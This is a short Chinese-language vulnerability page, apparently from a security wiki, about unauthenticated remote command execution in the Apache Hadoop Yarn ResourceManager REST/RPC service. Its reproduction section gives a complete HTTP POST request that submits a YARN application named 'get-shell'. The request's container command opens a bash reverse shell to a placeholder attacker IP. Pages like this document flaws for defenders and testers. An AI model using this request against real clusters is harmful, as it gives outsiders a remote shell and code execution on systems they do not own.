Apache Hadoop Yarn RPC 远程命令执行漏洞¶
漏洞描述¶
Hadoop Yarn RPC未授权访问漏洞存在于Hadoop Yarn中负责资源管理和任务调度的ResourceManager,成因是该组件为用户提供的RPC服务默认情况下无需认证即可访问,
漏洞影响¶
网络测绘¶
漏洞复现¶
主页面
验证请求包
POST /ws/v1/cluster/apps HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 215
Content-Type: application/json
{"application-id": "application_1655112607010_0005", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9998 0>&1"}}, "application-type": "YARN"}
